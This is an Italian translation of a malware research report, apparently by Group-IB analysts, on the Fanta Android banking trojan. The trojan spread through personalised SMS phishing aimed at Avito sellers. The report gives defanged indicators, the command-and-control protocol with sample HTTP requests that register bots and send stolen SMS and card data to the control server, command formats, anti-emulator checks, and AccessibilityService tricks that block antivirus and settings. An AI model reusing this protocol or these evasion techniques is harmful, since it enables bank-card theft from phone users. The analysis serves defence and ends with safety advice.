Un giorno vuoi vendere qualcosa su Avito e, dopo aver pubblicato una descrizione dettagliata del tuo prodotto (ad esempio un modulo RAM), riceverai questo messaggio:
Una volta aperto il collegamento, vedrai una pagina apparentemente innocua che notifica a te, il venditore felice e di successo, che è stato effettuato un acquisto:
Dopo aver fatto clic sul pulsante "Continua", sul tuo dispositivo Android verrà scaricato un file APK con un'icona e un nome che ispira fiducia. Hai installato un'applicazione che per qualche motivo richiedeva i diritti di AccessibilityService, poi sono apparse un paio di finestre che sono rapidamente scomparse e... Questo è tutto.
Vai a controllare il tuo saldo, ma per qualche motivo la tua app bancaria ti chiede nuovamente i dettagli della tua carta. Dopo aver inserito i dati, accade qualcosa di terribile: per qualche motivo ancora poco chiaro, il denaro inizia a scomparire dal tuo conto. Stai cercando di risolvere il problema, ma il tuo telefono resiste: preme i tasti “Indietro” e “Home”, non si spegne e non permette di attivare alcuna misura di sicurezza. Di conseguenza, rimani senza soldi, i tuoi beni non sono stati acquistati, sei confuso e ti chiedi: cosa è successo?
La risposta è semplice: siete vittime del trojan Android Fanta, della famiglia Flexnet. Come è successo? Spieghiamo ora.
Autori: Andrej Polovinkin, specialista junior nell'analisi del malware, Ivan Pisarev, specialista nell'analisi del malware.
alcune statistiche
La famiglia di trojan Android Flexnet è diventata nota per la prima volta nel 2015. Nel corso di un periodo di attività abbastanza lungo, la famiglia si espanse in diverse sottospecie: Fanta, Limebot, Lipton, ecc. Il Trojan, così come l'infrastruttura ad esso associata, non si ferma: si stanno sviluppando nuovi schemi di distribuzione efficaci - nel nostro caso, pagine di phishing di alta qualità rivolte a uno specifico utente-venditore, e gli sviluppatori Trojan seguono le tendenze alla moda in scrittura di virus: aggiunta di nuove funzionalità che consentono di rubare denaro in modo più efficiente dai dispositivi infetti e di aggirare i meccanismi di protezione.
La campagna descritta in questo articolo è rivolta agli utenti provenienti dalla Russia; un piccolo numero di dispositivi infetti è stato registrato in Ucraina, e ancora meno in Kazakistan e Bielorussia.
Anche se Flexnet è nell'arena dei trojan Android ormai da oltre 4 anni ed è stato studiato in dettaglio da molti ricercatori, è ancora in buona forma. A partire da gennaio 2019, l’importo potenziale dei danni ammonta a oltre 35 milioni di rubli, e questo vale solo per le campagne in Russia. Nel 2015 nei forum clandestini sono state vendute diverse versioni di questo trojan Android, dove si trovava anche il codice sorgente del trojan con una descrizione dettagliata. Ciò significa che le statistiche dei danni nel mondo sono ancora più impressionanti. Non è un brutto indicatore per un uomo così vecchio, vero?
Dalla vendita all'inganno
Come si può vedere dallo screenshot presentato in precedenza di una pagina di phishing per il servizio Internet di pubblicazione di annunci Avito, è stata preparata per una vittima specifica. A quanto pare gli aggressori utilizzano uno dei parser di Avito, che estrae il numero di telefono e il nome del venditore, nonché la descrizione del prodotto. Dopo aver espanso la pagina e preparato il file APK, alla vittima viene inviato un SMS con il suo nome e un collegamento a una pagina di phishing contenente la descrizione del suo prodotto e l'importo ricavato dalla “vendita” del prodotto. Facendo clic sul pulsante, l'utente riceve un file APK dannoso: Fanta.
Uno studio sul dominio shcet491[.]ru ha dimostrato che è delegato ai server DNS di Hostinger:
- ns1.hostinger.ru
- ns2.hostinger.ru
- ns3.hostinger.ru
- ns4.hostinger.ru
Il file della zona del dominio contiene voci che puntano agli indirizzi IP 31.220.23[.]236, 31.220.23[.]243 e 31.220.23[.]235. Tuttavia, il record di risorse primario del dominio (record A) punta a un server con indirizzo IP 178.132.1[.]240.
L'indirizzo IP 178.132.1[.]240 si trova nei Paesi Bassi e appartiene all'hoster Worldstream. Gli indirizzi IP 31.220.23[.]235, 31.220.23[.]236 e 31.220.23[.]243 si trovano nel Regno Unito e appartengono al server di hosting condiviso HOSTINGER. Utilizzato come registratore openprov-ru. Anche i seguenti domini hanno risolto l'indirizzo IP 178.132.1[.]240:
- sdelka-ru[.]ru
- tovar-av[.]ru
- av-tovar[.]ru
- ru-sdelka[.]ru
- shcet382[.]ru
- sdelka221[.]ru
- sdelka211[.]ru
- vyplata437[.]ru
- viplata291[.]ru
- perevod273[.]ru
- perevod901[.]ru
Va notato che da quasi tutti i domini erano disponibili collegamenti nel seguente formato:
http://(www.){0,1}<%domain%>/[0-9]{7}
Questo modello include anche un collegamento da un messaggio SMS. Sulla base dei dati storici è emerso che un dominio corrisponde a più link secondo lo schema sopra descritto, il che indica che un dominio è stato utilizzato per distribuire il trojan a diverse vittime.
Facciamo un piccolo salto in avanti: il trojan scaricato tramite il link di un SMS utilizza l'indirizzo come server di controllo onuseddohap[.]club. Questo dominio è stato registrato il 2019-03-12 e a partire dal 2019-04-29 le applicazioni APK hanno interagito con questo dominio. Sulla base dei dati ottenuti da VirusTotal, un totale di 109 applicazioni hanno interagito con questo server. Il dominio stesso si è risolto nell'indirizzo IP 217.23.14[.]27, situato nei Paesi Bassi e di proprietà dell'hoster Worldstream. Utilizzato come registratore Namecheap. Anche i domini sono stati risolti con questo indirizzo IP bad-racoon[.]club (a partire dal 2018-09-25) e bad-racoon[.]live (a partire dal 2018-10-25). Con dominio bad-racoon[.]club hanno interagito più di 80 file APK bad-racoon[.]live - più di 100.
In generale, l’attacco procede come segue:
Cosa c'è sotto il coperchio di Fanta?
Come molti altri trojan Android, Fanta è in grado di leggere e inviare messaggi SMS, effettuare richieste USSD e visualizzare le proprie finestre sopra le applicazioni (comprese quelle bancarie). Tuttavia, l'arsenale di funzionalità di questa famiglia è arrivato: Fanta ha iniziato a utilizzare AccessibilitàServizio per vari scopi: leggere il contenuto delle notifiche di altre applicazioni, impedire il rilevamento e fermare l'esecuzione di un Trojan su un dispositivo infetto, ecc. Fanta funziona su tutte le versioni di Android non inferiori alla 4.4. In questo articolo daremo uno sguardo più da vicino al seguente campione Fanta:
- MD5: 0826bd11b2c130c4c8ac137e395ac2d4
- SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
- SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb
Subito dopo il lancio
Subito dopo il lancio, il Trojan nasconde la sua icona. L'applicazione può funzionare solo se il nome del dispositivo infetto non è presente nell'elenco:
- android_x86
- VirtualBox
- Nexus 5X(testa di scazzone)
- Nexus 5(rasoio)
Questo controllo viene effettuato nel servizio principale del Trojan: MainService. Al primo avvio, i parametri di configurazione dell'applicazione vengono inizializzati sui valori predefiniti (il formato per la memorizzazione dei dati di configurazione e il loro significato verranno discussi in seguito) e un nuovo dispositivo infetto viene registrato sul server di controllo. Una richiesta HTTP POST con il tipo di messaggio verrà inviata al server registro_bot e informazioni sul dispositivo infetto (versione Android, IMEI, numero di telefono, nome dell'operatore e codice del paese in cui è registrato l'operatore). L'indirizzo funge da server di controllo hXXp://onuseseddohap[.]club/controller.php. In risposta, il server invia un messaggio contenente i campi bot_id, bot_pwd, server — l'applicazione salva questi valori come parametri del server CnC. Parametro server facoltativo se il campo non è stato ricevuto: Fanta utilizza l'indirizzo di registrazione - hXXp://onuseseddohap[.]club/controller.php. La funzione di modifica dell'indirizzo CnC può essere utilizzata per risolvere due problemi: distribuire uniformemente il carico su più server (con un numero elevato di dispositivi infetti, il carico su un server web non ottimizzato può essere elevato) e anche utilizzare un'alternativa server in caso di guasto di uno dei server CnC.
Se si verifica un errore durante l'invio della richiesta, il Trojan ripeterà il processo di registrazione dopo 20 secondi.
Una volta che il dispositivo è stato registrato con successo, Fanta mostrerà all'utente il seguente messaggio:
Nota importante: il servizio ha chiamato Sicurezza del sistema — il nome del servizio Trojan e dopo aver fatto clic sul pulsante Bene Si aprirà una finestra con le impostazioni di accessibilità del dispositivo infetto, in cui l'utente deve concedere i diritti di accessibilità per il servizio dannoso:
Non appena l'utente si accende AccessibilitàServizio, Fanta accede al contenuto delle finestre dell'applicazione e alle azioni eseguite in esse:
Subito dopo aver ricevuto i diritti di accessibilità, il Trojan richiede diritti di amministratore e diritti di lettura delle notifiche:
Utilizzando AccessibilityService, l'applicazione simula la sequenza dei tasti, assegnandosi così tutti i diritti necessari.
Fanta crea più istanze di database (che verranno descritte più avanti) necessarie per archiviare i dati di configurazione, nonché le informazioni raccolte nel processo sul dispositivo infetto. Per inviare le informazioni raccolte, il Trojan crea un'attività ripetitiva progettata per scaricare campi dal database e ricevere un comando dal server di controllo. L'intervallo di accesso al CnC viene impostato a seconda della versione di Android: nel caso della 5.1 l'intervallo sarà di 10 secondi, altrimenti 60 secondi.
Per ricevere il comando, Fanta fa una richiesta Ottieniattività al server di gestione. In risposta il CnC può inviare uno dei seguenti comandi:
| Squadra | descrizione |
|---|---|
| 0 | Invia messaggio SMS |
| 1 | Effettua una telefonata o un comando USSD |
| 2 | Aggiorna un parametro intervallo |
| 3 | Aggiorna un parametro intercettare |
| 6 | Aggiorna un parametro smsManager |
| 9 | Inizia a raccogliere messaggi SMS |
| 11 | Ripristina il telefono alle impostazioni di fabbrica |
| 12 | Abilita/Disabilita la registrazione della creazione della finestra di dialogo |
Fanta raccoglie anche le notifiche di 70 app bancarie, sistemi di pagamento veloce e portafogli elettronici e le archivia in un database.
Memorizzazione dei parametri di configurazione
Per memorizzare i parametri di configurazione, Fanta utilizza un approccio standard per la piattaforma Android: Preferenze-File. Le impostazioni verranno salvate in un file denominato impostazioni. Una descrizione dei parametri salvati è nella tabella seguente.
| Nome | Valore predefinito | Possibili valori | descrizione |
|---|---|---|---|
| id | 0 | Numero intero | ID del bot |
| server | hXXp://onuseseddohap[.]club/ | URL | Indirizzo del server di controllo |
| pwd | - | Corda | Password del server |
| intervallo | 20 | Numero intero | Intervallo di tempo. Indica per quanto tempo devono essere rinviate le seguenti attività:
|
| intercettare | contro tutti i | tutti/numerotel | Se il campo è uguale alla stringa contro tutti i o Numero di telefono, il messaggio SMS ricevuto verrà intercettato dall'applicazione e non mostrato all'utente |
| smsManager | 0 | 0/1 | Abilita/disabilita l'applicazione come destinatario SMS predefinito |
| readDialog | falso | Vero falso | Abilita/Disabilita la registrazione degli eventi Accessibilità Evento |
Anche Fanta utilizza il file smsManager:
| Nome | Valore predefinito | Possibili valori | descrizione |
|---|---|---|---|
| conf | - | Corda | Nome del gestore dei messaggi SMS utilizzato |
Interazione con database
Durante il suo funzionamento, il Trojan utilizza due database. Database denominato a utilizzato per memorizzare varie informazioni raccolte dal telefono. Il secondo database è denominato fanta.db e viene utilizzato per salvare le impostazioni responsabili della creazione di finestre di phishing progettate per raccogliere informazioni sulle carte bancarie.
Il trojan utilizza il database а per archiviare le informazioni raccolte e registrare le tue azioni. I dati vengono archiviati in una tabella i registri. Per creare una tabella, utilizzare la seguente query SQL:
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)Il database contiene le seguenti informazioni:
1. Registrare l'avvio del dispositivo infetto con un messaggio Il telefono acceso!
2. Notifiche dalle applicazioni. Il messaggio viene generato secondo il seguente modello:
(<%App Name%>)<%Title%>: <%Notification text%>
3. Dati delle carte bancarie provenienti da moduli di phishing creati dal Trojan. Parametro VISUALIZZA_NOME può essere uno dei seguenti:
- AliExpress
- Avito
- Google Play
- Varie <%Nome app%>
Il messaggio viene registrato nel formato:
[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>
4. Messaggi SMS in entrata/uscita nel formato:
([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>
5. Informazioni sul pacchetto che crea la finestra di dialogo nel formato:
(<%Package name%>)<%Package information%>
Tabella di esempio i registri:
Una delle funzionalità di Fanta è la raccolta di informazioni sulle carte bancarie. La raccolta dei dati avviene attraverso la creazione di finestre di phishing all'apertura di applicazioni bancarie. Il Trojan crea la finestra di phishing solo una volta. Le informazioni che la finestra è stata mostrata all'utente sono archiviate in una tabella impostazioni nel database fanta.db. Per creare un database, utilizzare la seguente query SQL:
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);Tutti i campi della tabella impostazioni per impostazione predefinita inizializzato a 1 (crea una finestra di phishing). Dopo che l'utente ha inserito i propri dati, il valore verrà impostato su 0. Esempio di campi della tabella impostazioni:
- può_login — il campo è responsabile della visualizzazione del modulo all'apertura di un'applicazione bancaria
- prima_banca - non usato
- can_avito — il campo è responsabile della visualizzazione del modulo all'apertura dell'applicazione Avito
- can_ali — il campo è responsabile della visualizzazione del modulo all'apertura dell'applicazione Aliexpress
- può_un altro — il campo è responsabile della visualizzazione del modulo all'apertura di qualsiasi applicazione dall'elenco: Yula, Pandao, Drom Auto, Portafoglio. Carte sconto e bonus, Aviasales, Booking, Trivago
- can_card — il campo è responsabile della visualizzazione del modulo all'apertura Google Play
Interazione con il server di gestione
L'interazione di rete con il server di gestione avviene tramite il protocollo HTTP. Per lavorare con la rete, Fanta utilizza la popolare libreria Retrofit. Le richieste vengono inviate a: hXXp://onuseseddohap[.]club/controller.php. L'indirizzo del server può essere modificato durante la registrazione sul server. I cookie possono essere inviati in risposta dal server. Fanta effettua le seguenti richieste al server:
- La registrazione del bot sul server di controllo avviene una sola volta, al primo avvio. Al server vengono inviati i seguenti dati sul dispositivo infetto:
· Cookies — cookie ricevuti dal server (il valore predefinito è una stringa vuota)
· modo — costante di stringa registro_bot
· prefisso — costante intera 2
· versione_sdk — è formato secondo il seguente modello: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
· imei — IMEI del dispositivo infetto
· nazione — codice del paese in cui è registrato l'operatore, in formato ISO
· numero - numero di telefono
· operatore — nome dell'operatoreUn esempio di richiesta inviata al server:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>In risposta alla richiesta, il server deve restituire un oggetto JSON contenente i seguenti parametri:
· bot_id — ID del dispositivo infetto. Se bot_id è uguale a 0, Fanta rieseguirà la richiesta.
bot_pwd — password per il server.
server — indirizzo del server di controllo. Parametro facoltativo. Se il parametro non viene specificato, verrà utilizzato l'indirizzo salvato nell'applicazione.Esempio di oggetto JSON:
{ "response":[ { "bot_id": <%BOT_ID%>, "bot_pwd": <%BOT_PWD%>, "server": <%SERVER%> } ], "status":"ok" }
- Richiesta di ricevere un comando dal server. Al server vengono inviati i seguenti dati:
· Cookies — cookie ricevuti dal server
· offerta — ID del dispositivo infetto ricevuto al momento dell'invio della richiesta registro_bot
· pwd —password per il server
· dispositivo_admin — il campo determina se sono stati ottenuti i diritti di amministratore. Se sono stati ottenuti i diritti di amministratore il campo è uguale a 1altrimenti 0
· Accessibilità — Stato operativo del servizio di accessibilità. Se il servizio è stato avviato, il valore è 1altrimenti 0
· SMS Manager — mostra se il Trojan è abilitato come applicazione predefinita per la ricezione di SMS
· schermo — visualizza lo stato in cui si trova lo schermo. Il valore verrà impostato 1, se lo schermo è acceso, altrimenti 0;Un esempio di richiesta inviata al server:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>A seconda del comando, il server può restituire un oggetto JSON con parametri diversi:
· Squadra Invia messaggio SMS: I parametri contengono il numero di telefono, il testo del messaggio SMS e l'ID del messaggio inviato. L'identificatore viene utilizzato quando si invia un messaggio al server con tipo setSmsStatus.
{ "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" }· Squadra Effettua una telefonata o un comando USSD: il numero di telefono o il comando viene fornito nel corpo della risposta.
{ "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" }· Squadra Modificare il parametro dell'intervallo.
{ "response": [ { "mode": 2, "interval": <%SECONDS%> } ], "status":"ok" }· Squadra Modificare il parametro di intercettazione.
{ "response": [ { "mode": 3, "intercept": "all"/"telNumber"/<%ANY_STRING%> } ], "status":"ok" }· Squadra Modificare il campo SmsManager.
{ "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" }· Squadra Raccogli messaggi SMS da un dispositivo infetto.
{ "response": [ { "mode": 9 } ], "status":"ok" }· Squadra Ripristina il telefono alle impostazioni di fabbrica:
{ "response": [ { "mode": 11 } ], "status":"ok" }· Squadra Modificare il parametro ReadDialog.
{ "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" }
- Invio di un messaggio con tipo setSmsStatus. Questa richiesta viene effettuata dopo l'esecuzione del comando Invia messaggio SMS. La richiesta è simile alla seguente:
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0
mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>- Caricamento dei contenuti del database. Viene trasmessa una riga per richiesta. Al server vengono inviati i seguenti dati:
· Cookies — cookie ricevuti dal server
· modo — costante di stringa setSaveInboxSms
· offerta — ID del dispositivo infetto ricevuto al momento dell'invio della richiesta registro_bot
· testo — testo nel record del database corrente (campo d dal tavolo i registri nel database а)
· numero — nome del record corrente del database (campo p dal tavolo i registri nel database а)
· sms_mode — valore intero (campo m dal tavolo i registri nel database а)La richiesta è simile alla seguente:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>Se inviata con successo al server, la riga verrà eliminata dalla tabella. Esempio di oggetto JSON restituito dal server:
{ "response":[], "status":"ok" }
Interazione con AccessibilityService
AccessibilityService è stato implementato per rendere i dispositivi Android più facili da usare per le persone con disabilità. Nella maggior parte dei casi, per interagire con un'applicazione è necessaria l'interazione fisica. AccessibilityService ti consente di eseguirli a livello di codice. Fanta utilizza il servizio per creare finestre false nelle applicazioni bancarie e impedire agli utenti di aprire le impostazioni di sistema e alcune applicazioni.
Utilizzando la funzionalità dell'AccessibilityService, il Trojan monitora le modifiche agli elementi sullo schermo del dispositivo infetto. Come descritto in precedenza, le impostazioni di Fanta contengono un parametro responsabile della registrazione delle operazioni con finestre di dialogo - readDialog. Se questo parametro è impostato, verranno aggiunte al database le informazioni sul nome e sulla descrizione del pacchetto che ha attivato l'evento. Il Trojan esegue le seguenti azioni quando vengono attivati gli eventi:
- Simula la pressione dei tasti Indietro e Home nei seguenti casi:
· se l'utente desidera riavviare il proprio dispositivo
· se l'utente desidera eliminare l'applicazione "Avito" o modificare i diritti di accesso
· se nella pagina è menzionata l'applicazione “Avito”.
· quando si apre l'applicazione Google Play Protect
· quando si aprono pagine con le impostazioni di AccessibilityService
· quando viene visualizzata la finestra di dialogo Sicurezza del sistema
· quando si apre la pagina con le impostazioni “Disegna su altre app”.
· all'apertura della pagina “Applicazioni”, “Ripristino e ripristino”, “Ripristino dati”, “Impostazioni ripristino”, “Pannello sviluppatore”, “Speciale. opportunità”, “Opportunità speciali”, “Diritti speciali”
· se l'evento è stato generato da determinate applicazioni.Elenco delle applicazioni
- androide
- Maestro Lite
- Pulire Maestro
- Clean Master per CPU x86
- Gestione dei permessi delle applicazioni Meizu
- Sicurezza MIUI
- Clean Master: antivirus, cache e pulitore di rifiuti
- Controllo genitori e GPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock e Web Security Beta
- Virus Cleaner, Antivirus, Cleaner (protezione MAX)
- Protezione antivirus mobile PRO
- Avast antivirus e protezione gratuita 2019
- MegaFon per la sicurezza mobile
- Protezione AVG per Xperia
- Sicurezza mobile
- Malwarebytes antivirus e protezione
- Antivirus per Android 2019
- Security Master: antivirus, VPN, AppLock, Booster
- Antivirus AVG per tablet Huawei Gestore di sistema
- Accessibilità Samsung
- Samsung Smart Manager
- Maestro di sicurezza
- Potenziatore di velocità
- Dr.Web
- Dr.Web Security Space
- Centro di controllo mobile Dr.Web
- Dr.Web Sicurezza Spazio Vita
- Centro di controllo mobile Dr.Web
- Antivirus e sicurezza mobile
- Kaspersky Internet Security: antivirus e protezione
- Durata della batteria di Kaspersky: risparmio e potenziamento
- Kaspersky Endpoint Security: protezione e gestione
- AVG Antivirus gratuito 2019 – Protezione per Android
- antivirus Android
- Norton Mobile Security e Antivirus
- Antivirus, firewall, VPN, sicurezza mobile
- Mobile Security: antivirus, VPN, protezione antifurto
- Antivirus per Android
- Se viene richiesta l'autorizzazione per l'invio di un messaggio SMS ad un numero breve, Fanta simula il clic sulla casella di controllo Ricorda la scelta e pulsante inviare.
- Quando provi a togliere i diritti di amministratore al Trojan, blocca lo schermo del telefono.
- Impedisce l'aggiunta di nuovi amministratori.
- Se l'applicazione antivirus dr.web rilevata una minaccia, Fanta imita la pressione del pulsante ignorare.
- Il Trojan simula la pressione dei pulsanti Indietro e Home se l'evento è stato generato dall'applicazione Cura del dispositivo Samsung.
- Fanta crea finestre di phishing con moduli per l'inserimento di informazioni sulle carte bancarie se viene lanciata un'applicazione da un elenco di circa 30 diversi servizi Internet. Tra questi: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto, ecc.
Moduli di phishing
Fanta analizza quali applicazioni sono in esecuzione sul dispositivo infetto. Se è stata aperta un'applicazione di interesse, il Trojan visualizza sopra tutte le altre finestre di phishing, che è un modulo per inserire i dati della carta bancaria. L'utente dovrà inserire i seguenti dati:
- Numero di carta
- Data di scadenza della carta
- CVV
- Nome del titolare della carta (non per tutte le banche)
A seconda dell'applicazione in esecuzione, verranno visualizzate diverse finestre di phishing. Di seguito sono riportati esempi di alcuni di essi:
Aliexpress:
Avuto:
Per alcune altre applicazioni, ad es. Google Play Market, Aviasales, Pandao, Booking, Trivago:
Com'era davvero
Fortunatamente, la persona che ha ricevuto il messaggio SMS descritto all’inizio dell’articolo si è rivelata uno specialista della sicurezza informatica. Pertanto, la versione reale, non del regista, è diversa da quella raccontata in precedenza: una persona ha ricevuto un SMS interessante, dopo di che lo ha consegnato al team di Threat Hunting Intelligence del Gruppo-IB. Il risultato dell'attacco è questo articolo. Lieto fine, vero? Tuttavia, non tutte le storie finiscono con lo stesso successo, e affinché la tua non assomigli a un taglio del regista con una perdita di denaro, nella maggior parte dei casi è sufficiente rispettare le seguenti regole a lungo descritte:
- non installare applicazioni per un dispositivo mobile con sistema operativo Android da fonti diverse da Google Play
- Quando si installa un'applicazione, prestare particolare attenzione ai diritti richiesti dall'applicazione
- prestare attenzione alle estensioni dei file scaricati
- installare regolarmente gli aggiornamenti del sistema operativo Android
- non visitare risorse sospette e non scaricare file da lì
- Non fare clic sui collegamenti ricevuti nei messaggi SMS.
Fonte: habr.com